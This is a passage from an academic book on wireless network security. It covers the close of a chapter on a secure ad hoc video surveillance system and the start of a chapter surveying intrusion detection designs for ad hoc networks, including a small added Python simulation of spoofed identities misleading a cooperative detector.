• Load balanced routing protocols: One problem of the routing protocol is that it is not reactive to the load in each node. Under a particular topology, if a node has a more critical location than others, a large portion of the traffic may converge toward the node and it may collapse under the heavy traffic. It would be more desirable for an ad hoc network that the routing protocol


fairly distributes the traffic load among the nodes.
• Local misbehavior detection system: The system also needs to detect misbehaving neighbors. Only a few recent studies (e.g., Kargl, Klenk, Schlott, & Weber, 2005; Marti, Giuli, Lai, & Baker, 2000) have been conducted and reported in this field. Besides, in our case, misbehavior detection capability is limited by the computational power of the nodes. We hope to find an adaptive mechanism to suit our applications.
• Scalability: As demonstrated by the simulation results of our network layer, the monitoring center, as the only nondistributed component, is the bottleneck of the system. Some solutions must be found to scale the network size as far as possible.

Conclusion

A distributed video surveillance system typically consists of many video sources distributed over a wide area, transmitting live video streams to a central location for processing and monitoring. However, in the traditional wire-line solution, the deployment and maintenance of a large-scale video surveillance system are often expensive and time-consuming. Thus there has been strong interest in wireless solutions. But the practical implementation of a wireless surveillance system still faces the challenges of framework design of the wireless network, video processing, video data transmission, video quality control, and system security. Among them, system security is the most challenging problem and also the main concern of this chapter.

This chapter has presented the state-of-the-art across the domains of wireless communication, video processing, embedded systems, and security, through the design of a new secure video surveillance system. This system is based on the 802.11g ad hoc wireless infrastructure. Intel IXP425 network processors are used as the basic processing unit. A media-dependent video encryption scheme, including a reliable data embedding technique and a real-time video encryption algorithm, has been proposed and implemented to enable the system to work in an open and insecure wireless environment. The presented system offers several unique advantages: (1) it provides a high security guarantee; (2) it does not require expensive access points/routers; (3) it can be readily deployed since it is built upon the existing wireless ad hoc infrastructure; and (4) it is robust, with an adaptive mechanism, in the presence of an error-prone channel. This chapter would serve as a good reference for solving the issues of wireless multimedia and would bring new insights on the interaction of different technologies within the cross application domain.

Acknowledgment

This work was supported in part by grants from the National Natural Science Foundation of China (No. 60673184, No. 60432030, No. 60429202, No. 90412012), the national 863 program of China (No. 2007AA01Z419) and Microsoft Joint lab funding.

References

Alattar, A.M., Lin, E.T., & Celik, M.U. (2003). Digital watermarking of low bit-rate advanced simple profile MPEG-4 compressed video. IEEE Transaction on Circuits and Systems for Video Technology, 13(8), 787-800.

Allman, S. (2002). Encryption and security: The advanced encryption standard. EDN (pp. 26-30). Retrieved October 7, 2007, from http://www.edn.com/article/CA2html?ref=nbsa

Basgall. (1999). Experimental break-ins reveal vulnerability in Internet, Unix computer security. Retrieved October 7, 2007, from http://www.cs.duke.edu/news/index.php?article=16

Bender, W., Gruhl, D., Morimoto, & Lu, A. (1996). Techniques for data hiding. IBM System Journal, 38(3-4), 313-316.


Borisov, N., et al. (2003). Intercepting mobile communications: The insecurity of 802.11. In Proceedings of MOBICOM 2001 (pp. 180-189).

Broch, J.D., Maltz, A., Johnson, D.B., Hu, Y.-C., & Jetcheva, J. (1998). A performance comparison of multi-hop wireless ad-hoc network routing protocols. Mobile Computing and Networking, 85-97.

Chen, B., & Wornell, G.W. (2001). Quantization index modulation: A class of provably good methods for digital watermarking and information embedding. IEEE Transaction on Information Theory, 47(4), 1423-1443.

Desilva, S., & Das, S.R. (2000). Experimental evaluation of a wireless ad hoc network. In Proceedings of the 9th International Conference on Comp. Comm. & Networks (pp. 528-534).

Garcia-Macias, J.A., et al. (2003). Quality of service and mobility for the wireless Internet. ACM Wireless Networks, 9, 341-352.

Haas, Z.J. (1999). The performance of the zone routing protocol in reconfigurable wireless networks. Special Issue on Wireless Ad Hoc Network, IEEE Journal on Selected Areas in Communications, 17(8).

Herzberg, A., Jarecki, S., Krawczyk, H., & Yung, M. (1995). Proactive secret sharing or: How to cope with perpetual leakage. Lecture Notes in Computer Science, 963, 339.

IEEE. (2003). 802.11g IEEE Std 2003. Retrieved October 7, 2007, from http://grouper.ieee.org/groups/802/11/

Intel. (2006). Intel® IXP425 network processor. Intel product brief. Retrieved October 7, 2007, from http://www.intel.com/design/network/products/npfamily/ixp425.htm

Johansson, P., Larsson, T., Hedman, N., Mielczarek, B., & Degermark, M. (1999). Scenario-based performance analysis of routing protocols for mobile ad-hoc networks. In Proceedings of ACM Mobicom'99 (pp. 195-206).

Johnson, D.B., Maltz, D.A., & Broch, J. (2001). DSR: The dynamic source routing protocol for multihop wireless ad hoc networks. Ad hoc networking (pp. 139-172). Addison-Wesley.

Kargl, F., Klenk, A., Schlott, S., & Weber, M. (2005). Advanced detection of selfish or malicious nodes in ad hoc networks. Paper presented at the First European Workshop on Security in Ad-hoc and Sensor Networks (LNCS 3313, pp. 152-165).

Lamport, L., Shostak, R., & Pease, M. (1982). The Byzantine generals problem. ACM Transactions on Programming Languages and Systems, 4(3), 382-401.

Liu, X., & Eskicioglu, A. (2003, November 17-19). Selective encryption of multimedia content in distributed networks: Challenges and new directions. Paper presented at the IASTED International Conference on Communications, Internet and Information Technology (CIIT 2003), Scottsdale, AZ.

Luo, H., Zerfos, P., Kong, J., Lu, S., & Zhang, L. (2002). Self-securing ad hoc wireless networks. In Proceedings of the Seventh IEEE Symposium on Computers and Communications (ISCC '02) (pp. 567-574).

Marti, S., Giuli, T.J., Lai, K., & Baker, M. (2000). Mitigating routing misbehavior in mobile ad hoc networks. In Proceedings of International Conference on Mobile Computing and Networking (pp. 255-265).

Perkins, C.E., & Royer, E.M. (1999). Ad-hoc on-demand distance vector routing. In Proceedings of the 2nd IEEE Workshop on Mobile Computing Systems and Applications, New Orleans (pp. 90-100).

Perlman, R. (1992). Interconnections: Bridges and routers. Reading, MA: Addison-Wesley.

Plummer, D.C. (1982, November). An Ethernet address resolution protocol: Or converting network protocol addresses to 48.bit Ethernet hardware (RFC 826).

Samir, R.D., Perkins, C.E., & Royer, E.E. (2000). Performance comparison of two on-demand routing protocols for ad hoc networks. In Proceedings of IEEE INFOCOM (pp. 3-12).


Shamir, A. (1979). How to share a secret. Communication of the ACM, 22(11), 612-613.

Stallings, W. (1999). Network security essentials: Applications and standards (1st ed.). Prentice Hall.

Wentink, M. (2003). Overcoming IEEE 802.11g's interoperability hurdles. Communication Systems Design, 3, 1-29.

Yin, H., Lin, C., Sebastien, B., & Chu, X.W. (2005, October 13). A novel secure wireless video surveillance system based on Intel IXP425 network processor. In Proceedings of the 1st ACM Workshop on Wireless Multimedia Networking and Performance Modeling (WMuNeP '05), Montreal, Canada.

Yin, H., Lin, C., Qiu, F., Li, B., & Tan, Z. (2005). A media-dependent secure multicast protocol for adaptive video applications. In Proceedings of the SIGCOMM Asia Workshop.

Yin, H., Lin, C., Qiu, F., Min, G., & Chu, X. (in press). A novel key-embedded scheme for secure video multicast systems. International Journal of Computers & Electrical Engineering (No. 04-NM-904).

Zapata, M.G. (2005). Ad hoc on-demand distance vector (SAODV) routing. Retrieved October 7, 2007, from INTERNET-DRAFT draft-guerrero-manet-saodv-03.txt.

Zhou, L.D. (1999). Securing ad hoc networks. IEEE Network, Special Issue on Network Security, 13(6), 24-30.

Key Terms

Ad Hoc Network: A local area network created for a specific purpose and established for a single session, which does not require a router or a wireless base station. Specifically, a wireless ad hoc network is a self-organized computer network with wireless communication links.

Discrete Cosine Transform (DCT): A Fourier-related transform algorithm that is widely used for data compression. DCT converts data (pixels, waveforms, etc.) into sets of frequencies and expresses a function or a signal in terms of a sum of sinusoids with different frequencies and amplitudes. It is often used in signal and image processing, especially for lossy data compression.

GOP: The group of pictures (GOP) is a group of successive pictures within an MPEG-coded film or video stream. A GOP consists of all the pictures between two successive GOP headers.

Network Processor: An integrated circuit that is optimized for networking and communications functions, typically a programmable CPU chip.

Scalability: A property of a system, a network, or a process that can be modified to fit the problem area, that is, scaled to perform well with large-scale users.

Surveillance System: A closed-circuit television system used to monitor something.

Watermarking (Digital Watermark): A technique used to add hidden copyright notices or other verification messages in a digital signal or video so that it cannot be detected by a standard playback device or viewer.

Wireless Network: A telecommunications network whose interconnections between nodes use standard protocols, but without the use of network cabling.


Chapter XXXIII
Cutting the Gordian Knot: Intrusion Detection Systems in Ad Hoc Networks

John Felix Charles Joseph
Nanyang Technological University, Singapore

Amitabha Das
Nanyang Technological University, Singapore

Boon-Chong Seet
Auckland University of Technology, New Zealand

Bu-Sung Lee
Nanyang Technological University, Singapore

Abstract

Intrusion detection in ad hoc networks is a challenge because of the inherent characteristics of these networks, such as the absence of centralized nodes, the lack of infrastructure, and so forth. Furthermore, in addition to application-based attacks, ad hoc networks are prone to attacks targeting routing protocols. Issues in intrusion detection in ad hoc networks are addressed by numerous research proposals in the literature. In this chapter, we first enumerate the properties of ad hoc networks which affect intrusion detection systems. After that, significant intrusion detection system (IDS) architectures and methodologies proposed in the literature are elucidated. Strengths and weaknesses of these works are studied and explained. Finally, the future directions which will lead to the successful deployment of intrusion detection in ad hoc networks are discussed.

Introduction

Wireless ad hoc networks have attracted extensive attention among researchers in recent years. As the research activities matured, it has been widely realized that security in such networks is a major issue, and an extremely challenging one. The challenge arises mainly from the inherent
Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
Cutting the Gordian Knot: Intrusion Detection Systems in Ad Hoc Networks

characteristics of ad hoc networks. Chief among the characteristics which affect the design of an effective security framework for such networks are the highly distributed, decentralized, and dynamic natures of ad hoc networks. These properties, coupled with the lack of infrastructure in ad hoc networks, introduce some unprecedented issues, which are absent from and have never been explored in conventional networks.

A typical security system consists of two major components. The first is the intrusion prevention mechanism that aims to control access to the system and relies mainly on cryptographic techniques. The second one is the intrusion detection system that tries to detect if the prevention mechanism has been compromised by intruders and, if so, come up with an appropriate response to combat such intrusions. The intrusion detection system (IDS) thus forms the second line of defense (Nadkarni & Mishra, 2003).

Cryptographic techniques rely on secure key management and key distribution, which require supporting infrastructure. The lack of infrastructure makes it extremely difficult to implement cryptographic access control mechanisms in ad hoc networks. This makes intrusion detection all the more important for such networks. However, it turns out that the inherent characteristics of ad hoc networks render conventional IDS unsuitable for such networks. This has spawned the research in ad hoc IDS design (Brutch & Ko, 2003).

This chapter illustrates the difficulties in providing an efficient intrusion detection system for ad hoc networks. In doing so, it discusses in detail interesting ad hoc IDS models proposed in the literature. The strengths and weaknesses of these models are explained, and promising future directions for cutting the Gordian knot of ad hoc IDS are discussed.

Background

Although various analyses of intrusion detection mechanisms can be seen in the literature, only a few qualify as significant. Mishra, Nadkarni, and Patcha (2004) give a detailed overview of various ad hoc IDS architectures and methodologies. They offer an extensive analysis and understanding of IDS in ad hoc networks. A comprehensive comparison between various proposed intrusion detection systems for ad hoc networks is discussed. Selected architectures and detection strategies explained by Mishra et al., which were found significant, are detailed in this writing.

Zhang, Huang, and Lee (2005) propose an evaluation environment for MANET (mobile ad hoc network) intrusion detection systems. They emulated routing attacks and evaluated application-based intrusion detection architectures over it. The work introduces a novel concept of evaluating ad hoc IDS models using known attacks. Routing attack libraries are used, which exhibit attack scenarios over the IDS model under evaluation. The IDS models are evaluated for operational cost and effectiveness. Detection accuracy and false alarms are the primary evaluation parameters for assessing the IDS model in terms of detection effectiveness. The work is significant in providing a test-bed for ad hoc IDS models. Similarly, Little (2005) proposes a test-bed called TeaLab for ad hoc IDS design.

Concurrent to simulation-based ad hoc test-beds, Yang and Baras (2003) mathematically analyze vulnerabilities in ad hoc networks. The authors provide a great deal of understanding of the attack possibilities in the ad hoc domain. Mathematical methods find attacks exhaustively. In this theoretical analysis all possible attacks are hypothesized. This comprehensive vulnerability analysis aids in the design of an effective ad hoc IDS.

Characteristics of Ad Hoc Networks

Ad hoc networks differ from native wired/wireless networks in various aspects. These unique characteristics of ad hoc networks render typical security systems unsuitable (Awerbuch, Curtmola, Holmer, Rubens, & Nita-Rotaru, 2005; Papadimitratos & Haas, 2002). The fundamental concept of ad hoc networks is to have seamless connectivity without infrastructure or centralized control. The lack of



infrastructure and a centralized control node makes it hard for security systems to be implemented. Furthermore, factors such as mobility, physical protection, and so forth affect the design of effective security models for ad hoc systems. These factors are enumerated below.

Lack of Infrastructure

Ad hoc networks do not have a fixed infrastructure. Typically, in conventional networks, the infrastructure provides a secure location for the implementation of critical security mechanisms (Debar, Dacier, & Wespi, 1999). Due to the absence of infrastructure, ad hoc networks do not provide a safe and efficient location to implement the security system. Additionally, operations such as control, maintenance, and other administrative functions become hard in a distributed and infrastructure-less network. The only apparent resort is to install these critical modules in end-user nodes. Implementing critical security systems in unreliable end-user nodes poses a real challenge.

Absence of a Central Authority

Conventional networks have traffic-concentration areas, otherwise called choke points, where security systems can be placed and implemented efficiently. Control nodes are placed at these choke points to monitor and control the network. The absence of a centralized authority makes network monitoring and control a challenging issue for ad hoc networks.

Every node in an ad hoc network has equal responsibility in network functions, such as routing, maintenance, and so forth. This unique characteristic distributes the control authority to all nodes in the network. Nodes have to rely on neighbor nodes for routing and data forwarding. In other words, nodes have to trust neighbor end-user nodes for critical functions. As neighbors can be potential attackers, trusting unknown neighbors is precarious to the integrity of security and other critical systems.

The above two issues are the crux of the security concern in the ad hoc network paradigm. The following are additional factors which also affect ad hoc network security design, but to a lesser degree.

Wireless Links

In respect to security, wireless links are the weakest. This is due to the omnipresence of the wireless channel and the ease of physical access to it. Attacks such as eavesdropping, active masquerading, and so forth are more feasible in wireless networks than in a wired network. Furthermore, the most notorious of all attacks, the denial-of-service (DoS) attack, can be achieved easily in wireless networks by jamming the wireless channel or by routing attacks.

Poor Physical Protection

Usually, the nodes in an ad hoc network are mobile and easily accessible physically. This raises concerns about the physical protection of these devices. A single compromised node can bring down the entire network due to its prerogatives in the network.

Energy Constraints

Since ad hoc network nodes are mostly mobile and wireless, energy constraints are also a security issue. Typical symmetric encryption algorithms such as 3DES (triple data encryption standard) and AES (advanced encryption standard), and asymmetric encryption algorithms such as RSA (Rivest, Shamir, and Adleman) and its variants, incur high computation which may drain the battery of the mobile node. Additionally, energy-targeted attacks such as SDT (sleep deprivation torture), which aim to drain the mobile node's battery, also need consideration while designing an ad hoc security system (Jacoby, Marchany, & Davis, 2004).

Unsuitability of Static Configurations

The obvious and immediate security solution for an infrastructure-less and decentralized network is to provide static security systems installed in the nodes. Ad hoc networks are mostly implemented over
mobile nodes. Mobility introduces transient associations due to the dynamic nature of the network. Therefore, prediction of the security configuration in a dynamic ad hoc network may not be possible. Also, static security systems have poor adaptability to new attacks, which renders them inefficient.

Figure 1. Ad hoc routing insecurity: Route invasion

Delay Constraints

Security systems are delay-sensitive. Especially in highly dynamic environments, delay guarantees are necessary for the security system to function properly. This necessity arises from the transient associations in the ad hoc network, which are discussed in the succeeding section. However, delay guarantees are hard to give in dynamic networks because of wireless connectivity and mobility.

Transient Associations

The high mobility of nodes in an ad hoc environment makes connections between the nodes transient. Therefore, a node will not be able to get security-specific information from its neighbor node permanently. In other words, the time frame for particular information to be valid in the ad hoc network becomes very small because of transient associations.

Routing Security

Routing security is an issue that is unique to ad hoc networks (Papadimitratos & Haas, 2002). Conventional networks have security systems implemented in the IP, transport, or application layer. Only ad hoc networks need security at the routing layer or protocol. The need arises from the nature of ad hoc network technology, where every node can function as a router. Apparently, this has raised new challenges and issues, since securing a routing protocol has never been an issue for security system designers of legacy networks.

Any node in an ad hoc network can add, modify, or delete routes. This functionality is the root cause of the vulnerability of ad hoc routing protocols. A malicious node can send malicious routing control messages to its neighbors. Since ad hoc networks are highly distributed, decentralized, and dynamic systems, preventing or detecting a malicious routing message becomes difficult. Moreover, semantically distinguishing between malicious and benign routing messages is infeasible. Routing insecurity introduces new attack possibilities. Active attacks such as route invasion and route disruption cause active damage to the network routing functions (Awerbuch et al., 2005). Route invasion and disruption attacks aim to modify, add, or delete benign routes by sending malicious routing information
over the network. Passive attacks such as route monitoring and so forth try to eavesdrop for stealing sensitive information (Kong, Hong, & Gerla, 2003). To illustrate some of the difficulties and to familiarize the reader with routing insecurity in ad hoc networks, a trivial attack scenario is considered.

Let us examine route invasion, which is a trivial but destructive attack. In Figure 1(a), the benign route between S and D is through 1. In Figure 1(b), Node M sends a malicious routing control message, stating that it has a better route to D than through Node 1. This modifies the path from S to D from S → 1 → D to S → M → 2 → 3 → D. The modified path is not only inefficient; it includes the malicious Node M in the path. This extends the attack possibilities for the malicious Node M on nodes A or B. To thwart intrusion detection, Node M can impersonate Node 1 and provide falsified routing information which supports its cause. Due to the absence of a centralized authority and infrastructure, Node S has no trusted arbiter from which to get advice regarding whether the announced path is benign or otherwise. Malicious Node M has free access to the wireless channel and can exhibit anonymous routing attacks over S.

Static crypto systems fail here, due to poor physical protection, energy, and delay constraints. In the absence of a centralized authority, dynamic crypto systems are not possible. Critical security systems such as key management, admission/access control, and authentication become hard to implement due to the lack of infrastructure. Analogous to IP spoofing, ad hoc routing protocols are prone to spoofing. However, unlike IP, spoofing in ad hoc networks is done at the routing protocol rather than at the IP layer. Generically, ad hoc security needs to prevent or detect spoofing. However, the issue is more serious than in IP, since the target of the attack is the routing protocol itself.

Mobility, transient associations, and dynamicity make the detection of malicious routing control messages impractical. In the above example, Node S will not be able to determine with its local knowledge whether Node M is on a shortest route to D or acting maliciously, because even if Node M is not on a shortest/optimal path to Node D now, due to changing topology that may change at a point of time in the future. In other words, a malicious behavior highly resembles another benign behavior. Therefore, intrusion detection becomes very challenging.

INTRUSION DETECTION TECHNIQUES

Intrusion detection systems are mechanisms which provide a "second wall of defense" (Nadkarni & Mishra, 2003) for the network system. In other words, an IDS is a backup, in case the frontline security mechanisms fail. Therefore, an IDS fundamentally assumes that cryptographic systems do not prevail or have failed. As mentioned earlier, an IDS in ad hoc networks cannot trust information from other nodes. This limits the knowledge sharing between the nodes. Knowledge in an IDS is the set of new benign/malicious behavior patterns. Typical systems use an arbiter (centralized) node to facilitate knowledge sharing. However, the absence of any centralized node in ad hoc networks renders knowledge sharing unreliable. Unreliable information in a security system is worth no information at all.

Conventional IDS function in the application layer and monitor and detect malicious behavior exhibited by applications such as telnet, FTP, SMTP, and so forth. In rare cases, relatively simple IDS, such as firewalls, are implemented in the IP layer. However, ad hoc networks' need for routing security has brought forth the need to implement IDS which monitor routing protocols, such as AODV, OLSR, DSR, and so forth, and detect attacks on them. An IDS design for a routing protocol is an unexplored area of research. The requirements of an IDS for a routing protocol differ vastly from conventional IDS mechanisms.

Research in ad hoc IDS design is still in the rudimentary stages. Some research works (Hijazi & Nasser, 2005) on ad hoc IDS, which try to cut the Gordian knot, follow strongly the IDS design methodologies of their native IDS counterparts. In addition, most of the IDS models proposed in the literature focus on application-level IDS. The assumption that an application-level IDS for ad hoc networks will suffice is the major weakness of
these works. Therefore, though these IDS models consider ad hoc network characteristics and provide a decentralized and distributed IDS, they fail to address the routing insecurity.

Zhang, Lee, and Huang (2003) propose a distributed and decentralized IDS system at the routing layer but fail to describe the routing-level IDS model. Their work is similar to other research models on ad hoc IDS design, which provide application-level IDS. Eventually, Huang and Lee (2004) analyze AODV intensively and provide a strong understanding of AODV and a guide to designing an AODV IDS at the routing layer. However, they fail to state the statistical methodologies used in the IDS design.

In what follows, the existing IDS models are enumerated and their strengths and weaknesses are analyzed. Additionally, the feasibility of implementation of these methods is studied.

A SIMPLE IDS

Before venturing into the realm of ad hoc IDS designs, a short primer on a simple IDS model will be helpful. The fundamental working of an IDS is shown in Figure 2. A typical IDS model consists of three modules: detection module, response module, and audit trails (Athanasiades, Abler, Levine, Owen, & Riley, 2003). The audit trail is a database which stores known normal behavior or anomalous behavior patterns. The detection module analyzes the observed behavior by comparing it with the known behavior patterns in the audit trail database. There are two types of pattern matching methodologies: misbehavior detection and anomaly detection. Misbehavior detection uses known malicious behavior patterns for comparison at the detection module. Anomaly detection uses known normal behavior patterns and measures the deviation of the node's behavior from the known normal behavior patterns.

The main strength of misbehavior detection is that the probability of false alarm is quite low. However, the probability of detection is also low, as unknown attacks will escape detection. On the contrary, anomaly detection increases the probability of detection at the cost of increased false alarm rates. Typically, both mechanisms are used in concurrence to define a tradeoff point between probability of detection and false alarm rates.

Figure 2. A simple intrusion detection architecture

AD HOC NETWORK IDS REQUIREMENTS

Having seen the fundamental operation of an IDS, this section explores the essentials and challenges behind an efficient ad hoc IDS. Understanding the difference between an ad hoc IDS and the conventional IDS will help us to appreciate the requirements of an ad hoc IDS. Also, this will aid us in understanding the strengths and weaknesses of each proposed IDS model.

The notorious Mitnick IP spoofing attacks (Shimomura & Markoff, 1996) are classic examples which demonstrate the destructive capabilities of routing attacks. Legendary Mitnick used IP address spoofing to attack government and commercial networks by feigning IP addresses. In ad hoc networks,
spoofing a network address becomes naïve, since an attacker can get its hands on the routing protocol itself. The gamut of attack possibilities is infinite (Awerbuch, Curtmola, Holmer, Nita-Rotaru, & Rubens, 2004). In the following sections, we will explore the factors that affect ad hoc IDS.

Knowledge Limitations in Audits

To assess whether a behavior is malicious or benign, a node needs knowledge about different behaviors. It is evident that with more knowledge, the efficiency of distinguishing between malicious and benign behaviors increases. In conventional networks, knowledge is shared using a trusted arbiter node. The absence of a centralized node in ad hoc networks limits knowledge sharing. Knowledge sharing is precarious in a decentralized and distributed network. A malicious node can cast malicious information which may affect the integrity and security of the IDS itself. When a node receives contradictory information from benign and malicious nodes, a decision dilemma occurs. The IDS will not be able to decide which information is correct. To avoid this high-risk scenario, the nodes can only resort to local knowledge. Local knowledge is information gained through the node's own experience.

It can be argued that if the number of benign nodes is greater than the number of malicious nodes, knowledge sharing will be reliable. This is true to some extent. According to Byzantine agreement (Lamport, Shostak, & Pease, 1982), for the distributed global knowledge to be reliable, benign nodes should be greater than two-thirds of the total number of nodes. However, ad hoc networks have an interesting attack scenario which can thwart Byzantine agreement even in the presence of sufficient benign nodes. An attacker using address spoofing can create nonexistent neighbor nodes and can emulate malicious behavior for the nonexistent nodes. This gives the attacker the advantage of controlling the apparent number of malicious nodes in the network, thereby invalidating Byzantine agreement.

It is important to consider that audit trails from routing protocols differ significantly from audit information from application layer protocols. Audits from application layer protocols record user behavior (Balajinath & Raghavan, 2001), such as login attempts and failures, access rate, and so forth, whereas audits from routing protocols record node behavior such as mobility, speed, connectivity, and so forth. The user behavior features differ distinctly from routing protocol behavior features. Hence, the methodologies analyzing the audit trails have to be revised.

Detection Strategies

Detection methodologies can be classified as rule-based, statistical, and hybrid, which are explained below.

Rule-based detection uses static rules to determine maliciousness in behavior. Rules are a set of logical conditions, and when these conditions are met, the behavior is categorized as malicious. Let us consider a simple rule to illustrate. Failure of three or more consecutive login attempts can reasonably be used to decide that the behavior is malicious. More complex rules are formed using typical logical reasoning mechanisms such as expert systems. Static rule-based approaches which are practical in conventional IDS fail due to the dynamic nature of ad hoc networks. The dynamic behavior creates transient connections which make intrusion detection through static rules almost impossible. Furthermore, static security systems are known to perform inefficiently in dynamic and distributed systems.

Statistical approaches use probability estimation theory (Duda, Hart, & Stork, 2000) to add some flexibility to crisp logic and rule-based detection strategies. In the statistical approach, the probability of a behavior being malicious is determined by statistically analyzing the known benign behavior patterns. However, statistical analysis of routing behavior in ad hoc networks is inconclusive, and so is statistical IDS in ad hoc networks. Conventional IDS systems use the statistical approach (Verwoerd & Hunt, 2002) after very intensive data analysis (Bykova, Ostermann, & Tjaden, 2001) and are derived using computational intelligence methodologies (Duda, Hart, & Stork, 2000). These analyses are done for audit trails from application layer protocols. The
lack of similar research on routing behavior audits for ad hoc networks raises an interesting question on the suitability of statistical approaches for ad hoc IDS. This is another unexplored research area in ad hoc security.

Hybrid detection strategies combine the above two approaches. Hybrid mechanisms are expected to perform better than either approach alone, since they incorporate semantics (rule-based systems) and statistical intelligence. This is in fact supported by conventional IDS models, where hybrid systems are usually superior.

In the ad hoc IDS paradigm, these detection methodologies face numerous shortcomings. A major impediment is the lack of features describing a routing behavior. Features are parameters or values describing a behavior. For example, the number of server logins is a feature describing a user behavior over a server-client-based application layer protocol. Similarly, the delay between two routing requests is an example of a feature describing a routing behavior. Typically, for a user behavior, the number of features can extend from 40-100 or more. On the contrary, a routing control message has very few independent features. The content of a routing message is kept as minimal as possible to increase the routing efficiency. This has decreased the feature set describing a routing behavior. Different protocols have different features, and the feature set is highly protocol dependent.

Inference

It can be inferred that an ad hoc IDS model requires a complete reconstruction of the current conventional IDS architecture. An IDS which functions with only local knowledge, without a centralized node, adapts to dynamic environments, and efficiently identifies malicious behavior will be a magnum opus in the field of ad hoc network security. Additionally, functions such as learning new attacks (part of adaptation) without corrupting the local knowledge base will be beneficial (Hossain, Bridges, & Vaughn, 2003; Pokrajac & Lazarevic, 2004). Learning is itself a dynamic process; therefore learning in a highly dynamic, distributed, decentralized, and insecure environment will be challenging.

Figure 3. LIDS architecture
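As an added illustration of the knowledge-sharing problem discussed under Knowledge Limitations in Audits and summarised in the inference above (example code, not from the chapter), the following Python model has node S judge two neighbours either by pooling the intrusion reports it receives or by its own observations alone. The node names, report format, forwarding log and drop threshold of three are constructed assumptions; the two-thirds test is the Byzantine agreement bound the chapter cites.

```python
"""
Cooperative (shared) verdicts versus local knowledge in an ad hoc IDS.

A node that pools its neighbours' intrusion reports can be misled once
one attacker forges reports under identities that do not exist, while a
node that relies only on what it observed itself is unaffected.
Node names, the report format, the traffic log and the drop threshold
are constructed for this illustration.
"""
from collections import Counter
from dataclasses import dataclass
from fractions import Fraction


@dataclass(frozen=True)
class Report:
    """One shared intrusion report, as a cooperative IDS would receive it."""
    reporter: str     # identity the sender claims; nothing verifies it
    subject: str      # node the report is about
    malicious: bool   # reporter's verdict on the subject


def byzantine_bound_holds(total: int, honest: int) -> bool:
    """Lamport-Shostak-Pease condition: honest participants > 2/3 of total."""
    return Fraction(honest, total) > Fraction(2, 3)


def cooperative_verdict(reports, subject: str) -> bool:
    """Majority vote, one vote per *claimed* reporter identity.

    This is the shared-knowledge rule: every identity that sends a report
    counts once, so fabricated identities count as full participants.
    """
    votes = {}
    for r in reports:
        if r.subject == subject:
            votes[r.reporter] = r.malicious      # latest report per identity
    tally = Counter(votes.values())
    return tally[True] > tally[False]


def local_verdict(observations, subject: str, drop_threshold: int) -> bool:
    """Local-knowledge rule: count only the drops this node saw itself."""
    forwarded_flags = observations.get(subject, [])
    drops = sum(1 for forwarded in forwarded_flags if not forwarded)
    return drops >= drop_threshold


def run_scenario(fake_identities):
    """Node S judges neighbours M (drops packets) and A (behaves well).

    `fake_identities` are extra reporter names the attacker M invents;
    an empty list is the honest-majority baseline.
    """
    honest = ["A", "B", "C"]            # real, well-behaved neighbours of S
    # Constructed log of S's own observations: did the neighbour forward
    # each packet S handed to it?
    observations = {
        "M": [False, False, True, False, False],
        "A": [True, True, True, True, True],
    }
    reports = [Report(h, "M", True) for h in honest]      # honest: M is bad
    reports += [Report(h, "A", False) for h in honest]    # honest: A is fine
    for ident in ["M"] + list(fake_identities):           # M and its aliases
        reports.append(Report(ident, "M", False))         # clears itself
        reports.append(Report(ident, "A", True))          # frames A
    claimed = {r.reporter for r in reports}
    return {
        # Bound evaluated over real nodes (3 honest of 4) ...
        "bound_on_real_nodes": byzantine_bound_holds(len(honest) + 1, len(honest)),
        # ... and over the identities S can actually count.
        "bound_on_claimed_identities": byzantine_bound_holds(len(claimed), len(honest)),
        "cooperative_flags_M": cooperative_verdict(reports, "M"),
        "cooperative_flags_A": cooperative_verdict(reports, "A"),
        "local_flags_M": local_verdict(observations, "M", drop_threshold=3),
        "local_flags_A": local_verdict(observations, "A", drop_threshold=3),
    }


if __name__ == "__main__":
    for label, fakes in (("honest majority", []),
                         ("three spoofed identities", ["X1", "X2", "X3"])):
        print(label, run_scenario(fakes))
```

With three fabricated identities the pooled vote clears M and frames A while the real honest share is still 3 of 4; only the verdict built from S's own observations is stable.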

IDS MODELS

Intrusion detection systems have two major components: architectures and methodologies. IDS architectures are the designs which depict the overall functioning of the IDS, like the system shown in Figure 2. On the other hand, IDS methodologies are models for detection strategies and their supplementary functions, which are the internal functions of the IDS. The efficiency of the IDS depends both on the architecture and the methodologies. Mishra et al. (2004) analyzed various IDS architectures systematically. Succeeding sections discuss these IDS architectures following Mishra et al.'s (2004) analysis.

Most of the architectures proposed in the literature assume that the methodologies used in the conventional IDS model will suffice in an ad hoc environment. In the succeeding sections, the strength of this assumption is analyzed. Furthermore, it has been observed that research work which focuses on IDS architectures does not consider the limitations of IDS methodologies, and vice versa.

Architectures

IDS Using Mobile Agents

IDS systems are of two types: host-based and network-based. A host-based IDS, as the name implies, runs on individual nodes and functions partially or completely autonomously. On the other hand, in a network-based IDS, a centralized node is used to monitor and detect intrusions on the network. It is obvious that a network-based IDS is not possible in an ad hoc environment because of the absence of a centralized authority.

A mobile agent is a software module which aids in distributed host-based intrusion detection. The software module traverses the nodes in the network to accomplish a particular task, such as collecting information, processing information, and so forth. Mobile agents try to emulate network-based intrusion detection by using a collective host-based IDS. The mobile agent provides a good framework to create a distributed host-based intrusion detection system. However, mobile agents themselves pose a security threat to the ad hoc network. This is detailed in the following sections by analyzing the IDS architectures that use mobile agents.

Local Intrusion Detection System Using Mobile Agents

LIDS (Patrick, Olivier, Jean-Marc, Bernard, Ludovic, & Ricardo, 2002) is an application-based IDS architecture for providing intrusion detection in ad hoc networks. The IDS architecture, shown in Figure 3, consists of agents. Agents are host-based intrusion detection modules running on all nodes. The architecture utilizes SNMP (simple network management protocol) to communicate with the neighbors.

A local LIDS agent is responsible for detecting the attacks locally. LIDS agents help neighbor nodes to decide on a suspected intrusion. Also, an agent receives updates of new attack patterns from the neighbor nodes. The attack patterns are stored in the information base. The MIB (management information base) agent is used to manage the information base. Between the neighbor nodes, SNMP is used to exchange information such as new attack patterns, decisions/responses, and so forth. The MIB agent is responsible for retrieving and sending information to/from neighbors using SNMP. The authors exploit the cooperative nature of the ad hoc network by sharing the information about new attack patterns between the nodes.

Additionally, mobile agents are software modules which function autonomously for a dedicated task. For example, the LIDS may designate a mobile agent (MA) to determine the probability of a particular behavioral pattern being malicious. The MA will autonomously travel between nodes and gather evidence from the traversed nodes' MIBs.

